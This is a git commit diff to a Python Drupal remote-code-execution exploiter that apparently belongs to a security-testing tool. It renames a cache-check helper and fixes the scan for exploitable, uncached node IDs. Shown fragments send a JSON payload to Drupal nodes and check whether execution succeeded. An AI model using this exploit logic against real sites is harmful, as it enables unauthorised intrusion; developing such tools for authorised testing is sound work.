fixed logic and name in finding exploitable nodes

This commit is contained in:
ophirharpazg 2020-09-01 12:07:29 +03:00
parent 6e2678473c
commit f31186272f
1 changed files with 11 additions and 12 deletions

View File

@ -18,10 +18,8 @@ __author__ = 'Ophir Harpaz'
LOG = logging.getLogger(__name__)
def check_drupal_cache(r: requests.Response) -> bool:
"""
Check if a response had the cache header.
"""
def is_response_cached(r: requests.Response) -> bool:
""" Check if a response had the cache header. """
return 'X-Drupal-Cache' in r.headers and r.headers['X-Drupal-Cache'] == 'HIT'
@ -29,12 +27,13 @@ def find_exploitbale_article_ids(base_url: str, lower: int = 1, upper: int = 10)
""" Find target articles that do not 404 and are not cached """
articles = set()
while lower < upper:
u = urljoin(base_url, str(lower))
r = requests.get(u)
if r.status_code == 200: # found an article
node_url = urljoin(base_url, str(lower))
response = requests.get(node_url)
if response.status_code == 200:
if is_response_cached(response):
LOG.info(f'Found a cached article at: {node_url}, skipping')
else:
articles.add(lower)
if check_drupal_cache(r):
LOG.info(f'Found a cached article at: {lower}, skipping')
lower += 1
return articles
@ -109,7 +108,7 @@ class DrupalExploiter(WebRCE):
json=payload,
headers={"Content-Type": "application/hal+json"})
if check_drupal_cache(response):
if is_response_cached(response):
LOG.info(f'Checking if node {url} is vuln returned cache HIT, ignoring')
return False
@ -145,7 +144,7 @@ class DrupalExploiter(WebRCE):
r = requests.get(f'{url}?_format=hal_json', json=payload, headers={"Content-Type": "application/hal+json"})
if check_drupal_cache(r):
if is_response_cached(r):
LOG.info(f'Exploiting {url} returned cache HIT, may have failed')
if ID_STRING not in r.text: